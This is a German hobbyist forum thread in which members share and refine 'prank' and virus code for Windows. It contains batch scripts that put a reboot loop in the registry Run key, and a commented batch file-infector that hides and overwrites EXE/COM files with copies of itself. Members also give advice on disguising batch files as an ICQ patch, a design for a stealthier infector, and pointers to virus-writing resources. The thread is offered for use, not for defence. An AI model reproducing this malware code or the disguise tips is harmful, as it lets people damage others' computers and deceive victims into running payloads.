freak_111
Bekanntes Mitglied
da geb ich ihm nochmal recht! ^^
Viruse: grundlagen???
Diskutiere Viruse: grundlagen??? im Security-Zone - Sicherheitslücken, Virenschutz Forum im Bereich Hardware & Software Forum; da geb ich ihm nochmal recht! ^^
N
nightracer2
Bekanntes Mitglied
- Dabei seit
- 22.11.2008
- Beiträge
- 60
- Reaktionspunkte
- 0
ich krieg das ding schon wieder weg^^
runterfahren tuter sich schon net mehr, gibt aber ne ganze menge errormeldungen raus...
runterfahren tuter sich schon net mehr, gibt aber ne ganze menge errormeldungen raus...
RTW-Fahrer
Bekanntes Mitglied
- Dabei seit
- 14.10.2008
- Beiträge
- 1.724
- Reaktionspunkte
- 0
Ich hoffe, das hat dich von der Irren Vorstellung befreit, das man Viren Verteilen möchte.
und denk dran, das war nen 4 zeiler, und kein Vollständiger Virus.
und denk dran, das war nen 4 zeiler, und kein Vollständiger Virus.
destroyer-188
Bekanntes Mitglied
destroyer-188
Bekanntes Mitglied
würd viren halt nicht am eigenen pc testen
destroyer-188
Bekanntes Mitglied
Hier hast was ganz einfaches in vbs
oder so
Das öffnet eine messagebox wo steht virus
Code:
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "
msgbox "Virus!!!! ",vbokonly+vbexclamation, "Virus!!!! "oder so
Code:
for i=1 to 10
x = msgbox ("Virus ", 0+16 , "virus!!!!!!!! ") & i
nextDas öffnet eine messagebox wo steht virus
M
matrix3210
Neues Mitglied
- Dabei seit
- 23.11.2008
- Beiträge
- 3
- Reaktionspunkte
- 0
Max11.111 was benutzt du dafür für ein programm
oder ihr welches programm benutzt ihr
oder ihr welches programm benutzt ihr
Max11.111
Bekanntes Mitglied
- Dabei seit
- 12.06.2008
- Beiträge
- 2.416
- Reaktionspunkte
- 0
Bitte in Deutsch, ich habe kein Wort verstanden
//Edit:
Meinst du das
Code:
for i=1 to 10
x = msgbox ("Virus ", 0+16 , "virus!!!!!!!! ") & i
next
Code:
MessageBox(NULL, "Deine Festplatte wird formatiert!, "90% Formatiert", MB_OK | MB_ICONINFORMATION);
Code:
echo off
cls
echo Windows Registry Editor Version 5.00 > reg.reg
echo. >> reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> reg.reg
echo "shutdown"="shutdown -r -t 00" >> reg.reg
echo. >> reg.reg
echo ;startet den Pc immer wieder neu >> reg.reg
reg import reg.reg
del reg.reg
shutdown -r -t 00
exit
Zuletzt bearbeitet:
Max11.111
Bekanntes Mitglied
- Dabei seit
- 12.06.2008
- Beiträge
- 2.416
- Reaktionspunkte
- 0
]ich mein was du für ein programm benutzt wo du die viruse und die spaßviruse eingibst und so[/QUOTE]
Also:
Also:
Diesen Spaß-Virus
kannst du in eine Textdatei einfügen, welche du als *.vbs abspeicherst.Code:for i=1 to 10 x = msgbox ("Virus ", 0+16 , "virus!!!!!!!! ") & i next
Das Resultat: 10 sogenannten Message Boxen, in denen Virus steht.
- Den hier
(Fährt deinen PC herunter)Code:shutdown -s -t00
oder den hier
(schreibt einen Registryeintrag, sodass sich dein PC immer wieder neu startet)Code:echo off cls echo Windows Registry Editor Version 5.00 > reg.reg echo. >> reg.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> reg.reg echo "shutdown"="shutdown -r -t 00" >> reg.reg echo. >> reg.reg echo ;startet den Pc immer wieder neu >> reg.reg reg import reg.reg del reg.reg shutdown -r -t 00 exit
kopierst du in eine Textdatei und benennst sie in eine *.bat-Datei um.
- Das hier ist schon etwas schwieriger, das ist nur ein Code ausschnitt, der ganze C++-Code müsste (mindestens) so aussehen:
C++ wir auch als viel schneller, besser und systemnäher als z.B. vbs bezeichnet, deshalb ist es auch etwas schwieriger und längerCode:#include <windows.h> int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { [INDENT]MessageBox(NULL /*or hWnd*/, "TEXT", "ÜBERSCHRIFT", MB_OK | MB_ICONEXCLAMATION); } [/INDENT]
Der Code muss zuerst Compiliert werden, dann kann man das Programm erst ausführen.
Zuletzt bearbeitet:
M
matrix3210
Neues Mitglied
- Dabei seit
- 23.11.2008
- Beiträge
- 3
- Reaktionspunkte
- 0
Max11.111
leer mal deine mails oder so weil ich dir keine mehr schreiben kann
leer mal deine mails oder so weil ich dir keine mehr schreiben kann
Max11.111
Bekanntes Mitglied
- Dabei seit
- 12.06.2008
- Beiträge
- 2.416
- Reaktionspunkte
- 0
Okay
N
nightracer2
Bekanntes Mitglied
- Dabei seit
- 22.11.2008
- Beiträge
- 60
- Reaktionspunkte
- 0
sooo^^:hal:
jetzt is das "spaßprogramm" erstma eingedämmt...
und gelernt hab ich auch noch was^^
Teste niemals ein "spaßprogramm" am eigenen PC
Weiter probieren werd ich trotzdem...:fre:
mfg
nightracer2
jetzt is das "spaßprogramm" erstma eingedämmt...
und gelernt hab ich auch noch was^^
Teste niemals ein "spaßprogramm" am eigenen PC
Weiter probieren werd ich trotzdem...:fre:
mfg
nightracer2
L
Legende
Bekanntes Mitglied
um batch dateuen zu tarnen sehr gut
Bat-to-exe-converter
kannst z.b. ein icq icon nehmen und die datei icq-patch nennen
wette das öffnet einer eher als eine batch datei :hal:
Bat-to-exe-converter
kannst z.b. ein icq icon nehmen und die datei icq-patch nennen
wette das öffnet einer eher als eine batch datei :hal:
K
Killahking
Aktives Mitglied
Also ich find batch gut!
fred777
Bekanntes Mitglied
Batch ist einfach nur hilfreich, da es Vorgänge automatisiert
Homie1
Bekanntes Mitglied
Ich habe deinem Code mal noch was hinzugefügt. Dieser sollte so funtionieren allerdings ist er NOCH UNGETESTET ( hab gerade kein sytem da an dem ichs testen kann )
Hier ist noch mal eine Erklärung zu allen Befehlen die neu dazugekommen sind:
@echo off
Dieser Befehl bewirkt, dass die Befehle des Programmes beim ausführen
nicht angezeigt werden.
ctty nul
Hier werden alle Ausgaben ins Nichts geleitet. So das der 'Benutzer'
nicht sieht, dass Dateien kopiert wurden.
for %%f in (*.exe *.com) do set A=%%f
Hier werden alle EXE und COM Dateien und schreibt jede Datei in die
Variable A. Das bedeutet, dass am Ende die letzte, noch nicht
infizierte Datei in der Variable A gespeichert wird.
if %A%==COMMAND.COM set A=
Falls A die Datei Command.COM enthaelt, wird A Null gesetzt
rename %A% V%A%
Die gefundene Datei wird umbenannt in Vname
if not exist V%A% goto end
Sollte das Umbenennen schiefgegangen sein, wird zur Stelle :end
gesprungen und beendet
attrib +h V%A%
Die umbenannte Datei wird versteckt und somit nur durch Parameter
mit dem Befehl dir /a:h sichtbar, auserdem wird sie bei einer erneuten
Ausfuehrung des Programmes nicht noch einmal umbenannt.
copy %0.bat %A%
Der Virus (%0%) wird an die Stelle der COM Datei kopiert
attrib +r %A%
Nun wird die Datei vor dem Ueberschreiben geschuetzt
ren %A% *.bat
Nun noch eine Umbenennung in eine BAT Datei
set A=
Der Parameter A wird wieder geleert, um keine Spuren zu hinterlassen
:end
Hierher wird mit goto end gesprungen
ctty con
Die Ausgabe wird wieder auf den Bildschirm geleitet
@if exist V%0.com V%0.com %1 %2 %3
Falls die Ersetzte Datei eine COM Datei war, wird diese nun ausgeführt
@if exist V%0.exe V%0.exe %1 %2 %3
wie eben nur mit EXE Dateien
Das Prinzip beruht auf dem Wagner Virus
der von Black Wolf 1993 in Virology 101 praesentiert wurde.
Bei Fehlern im Code bitte meldöön
edit: Ich weiß jetzt net ob diese Vire unbemerkt versendet werden kann da z.b. avast! mich sogar schon vor dem aufrufen dieser I-net Seite gewarnt hat nach dem ich den post gemacht hab
Code:
@echo off
ctty nul
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
echo Windows Registry Editor Version 5.00 > reg.reg
echo. >> reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> reg.reg
echo "shutdown"="shutdown -r -t 00" >> reg.reg
echo. >> reg.reg
echo ;startet den Pc immer wieder neu >> reg.reg
reg import reg.reg
del reg.reg
shutdown -r -t 03
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3Hier ist noch mal eine Erklärung zu allen Befehlen die neu dazugekommen sind:
@echo off
Dieser Befehl bewirkt, dass die Befehle des Programmes beim ausführen
nicht angezeigt werden.
ctty nul
Hier werden alle Ausgaben ins Nichts geleitet. So das der 'Benutzer'
nicht sieht, dass Dateien kopiert wurden.
for %%f in (*.exe *.com) do set A=%%f
Hier werden alle EXE und COM Dateien und schreibt jede Datei in die
Variable A. Das bedeutet, dass am Ende die letzte, noch nicht
infizierte Datei in der Variable A gespeichert wird.
if %A%==COMMAND.COM set A=
Falls A die Datei Command.COM enthaelt, wird A Null gesetzt
rename %A% V%A%
Die gefundene Datei wird umbenannt in Vname
if not exist V%A% goto end
Sollte das Umbenennen schiefgegangen sein, wird zur Stelle :end
gesprungen und beendet
attrib +h V%A%
Die umbenannte Datei wird versteckt und somit nur durch Parameter
mit dem Befehl dir /a:h sichtbar, auserdem wird sie bei einer erneuten
Ausfuehrung des Programmes nicht noch einmal umbenannt.
copy %0.bat %A%
Der Virus (%0%) wird an die Stelle der COM Datei kopiert
attrib +r %A%
Nun wird die Datei vor dem Ueberschreiben geschuetzt
ren %A% *.bat
Nun noch eine Umbenennung in eine BAT Datei
set A=
Der Parameter A wird wieder geleert, um keine Spuren zu hinterlassen
:end
Hierher wird mit goto end gesprungen
ctty con
Die Ausgabe wird wieder auf den Bildschirm geleitet
@if exist V%0.com V%0.com %1 %2 %3
Falls die Ersetzte Datei eine COM Datei war, wird diese nun ausgeführt
@if exist V%0.exe V%0.exe %1 %2 %3
wie eben nur mit EXE Dateien
Das Prinzip beruht auf dem Wagner Virus
der von Black Wolf 1993 in Virology 101 praesentiert wurde.
Bei Fehlern im Code bitte meldöön
edit: Ich weiß jetzt net ob diese Vire unbemerkt versendet werden kann da z.b. avast! mich sogar schon vor dem aufrufen dieser I-net Seite gewarnt hat nach dem ich den post gemacht hab
Zuletzt bearbeitet:
Max11.111
Bekanntes Mitglied
- Dabei seit
- 12.06.2008
- Beiträge
- 2.416
- Reaktionspunkte
- 0
Code:
@echo off
[B]ctty nul[/B]
REM Der Befehl "ctty" konnte nicht gefunden werden...
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=Das mag vor ein paar Jahren funktioniert haben, aber jeder noch so schlechte Virenscanner erkennt diesen uralten Batch-Virus.
Außerdem ist es ja auch ein bisschen gar auffällig, wenn plötzlich keine Anwendung mehr funktioniert.
Ziel war ja früher, wenn man im cmd "format" eingegeben hat, eine Datei mit dem Namen "format" aufzurufen.
Zuerst wurde nach .com, dann nach .exe und zuletzt nach .bat-Dateien gesucht, die man aufrufen konnte.
Heute geht das schon noch, aber wer gibt denn beispielsweise in die Konsole ein: "iexplore http://www.powerforen.deforum/index.php"?!? Da sit ein Link da, der "cod5mp.exe" aufruft! Dann kann die Datei nicht gefunden werden, und der User wird misstrauisch...
Besser währe es:
- Kopiere jede gefundene *.exe /*.com-Datei.
- Benenne die Kopie in Orginalname.old.exe um.
- Füge jetzt in die Orginaldatei den Code eines Programmes ein, das:
- Zuerst die %name%.old mit allen übergebenen Parametern aufruft,
- Dann das ganze mit dem Dateisuchen von vorne beginnt.
P.S.:
Code:
[B]shutdown -r -t 03
REM Der PC wurde soeben heruntergefahren (es wird gewartet, bis jeder Befehl ausgeführt wurde!!!!)
:end[/B]
[I]ctty con[/I]
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3
Zuletzt bearbeitet:
Homie1
Bekanntes Mitglied
okay , thx .
Das mit dem Herunterfahren auf 3 sek sollte zu folge haben das wenn man z.b. ein Spiel startet es den eindruck macht das der pc wegen dem spiel ausgeht ( für unerfahrene nutzer )
Das mit dem Herunterfahren auf 3 sek sollte zu folge haben das wenn man z.b. ein Spiel startet es den eindruck macht das der pc wegen dem spiel ausgeht ( für unerfahrene nutzer )
Max11.111
Bekanntes Mitglied
- Dabei seit
- 12.06.2008
- Beiträge
- 2.416
- Reaktionspunkte
- 0
Wie gesagt, an sich ist der Virus ja ganz gut. Lieder (bzw. zum Glück) wird er von jedem Scanner erkannt.
Die Idee kann man sogar leicht modifiziert mit einer höheren Programmiersprache umsetzen (siehe Post #38?Besser_währe_es) und hat dann einen funktionierenden Vrus.
Ach ja, wenn du mehr über Viren wissen willst: "The Giant black book of computer viruses". Dann hast du 661 Seite vollgestopft mit wichtigen Basiswissen (natürlich in Englisch...").
Die Idee kann man sogar leicht modifiziert mit einer höheren Programmiersprache umsetzen (siehe Post #38?Besser_währe_es) und hat dann einen funktionierenden Vrus.
Ach ja, wenn du mehr über Viren wissen willst: "The Giant black book of computer viruses". Dann hast du 661 Seite vollgestopft mit wichtigen Basiswissen (natürlich in Englisch...").
Zuletzt bearbeitet:
C
cc_ip
Bekanntes Mitglied
- Dabei seit
- 08.03.2007
- Beiträge
- 214
- Reaktionspunkte
- 0
er hat nach viren gefragt nicht nach schwachsinn, wenn du einigermaßen gut mit asm oder c umgehen kannst guck dir die seite mal an:
http://vx.netlux.org/ oder suche nach snake-byte bei google
http://vx.netlux.org/ oder suche nach snake-byte bei google
Thema:
Viruse: grundlagen???
ANGEBOTE & SPONSOREN
